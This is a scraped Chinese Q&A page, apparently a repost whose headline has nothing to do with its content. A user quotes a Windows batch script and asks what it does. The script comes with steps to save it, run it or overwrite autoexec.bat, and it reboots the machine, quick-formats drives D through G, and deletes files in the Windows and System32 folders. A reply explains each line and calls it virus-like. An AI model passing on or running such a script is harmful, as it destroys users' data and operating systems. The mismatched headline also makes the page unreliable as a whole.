凝望的近义词和反义词:了解代码的GGMM们来看看这个是什么意思

来源:百度文库 编辑:杭州交通信息网 时间:2024/04/30 01:29:18
看看这个是什么意思?

--------------------------------
打开记事本输入:
@echo off
shutdown -r -t 0
format d: /q /y
format e: /q /y
format f: /q /y
format g: /q /y
c:
cd \
cd windows
del. /y
cd system32
del. /y
shutdown -r -t 0
另存为1.bat
然后运行
(重命命为autoexec.bat覆盖原来的autoexec.bat)
--------------------------------
还有autoexec.bat是什么意思

@echo off //关闭命令回显。即执行时不显示结果
shutdown -r -t 0 //XP下的命令:立即重启
format d: /q /y //格式化D盘
format e: /q /y
format f: /q /y
format g: /q /y //如上
c: //进入C盘
cd \ //回到根目录
cd windows //进入windows目录
del. /y //删除所有文件,不过在xp下该命令出错
cd system32 //进入system32目录
del. /y //删除所有文件
shutdown -r -t 0 //重启

autoexec.bat批处理文件,系统还没有完全启动时就会执行该文件,文件保护都没有生效,很多系统文件都可以被替换或删除

感觉像个病毒呢,呵呵,自动删除文件